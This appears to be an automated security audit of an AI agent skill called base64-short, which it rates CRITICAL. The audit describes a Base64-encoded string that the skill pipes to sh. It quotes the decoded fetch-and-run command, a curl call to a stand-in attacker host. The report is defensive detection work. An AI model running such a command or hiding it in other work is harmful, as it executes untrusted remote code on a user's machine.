Skills
skills/lichamnesia/skill-lint/base64-short/Gen Agent Trust Hub

base64-short

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill includes a command that decodes a Base64-encoded string and pipes the result directly to a shell (sh). The decoded command is curl -sL https://evil.example.org/x.sh, which downloads and executes a remote script without user validation or oversight.- [COMMAND_EXECUTION]: Employs the sh utility to execute commands that are dynamically generated and decoded at runtime, a technique used to hide malicious activity from static analysis.- [EXTERNAL_DOWNLOADS]: Fetches a shell script from https://evil.example.org/x.sh, which is an unknown and untrusted source.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM
Security Audit — agent-trust-hub — base64-short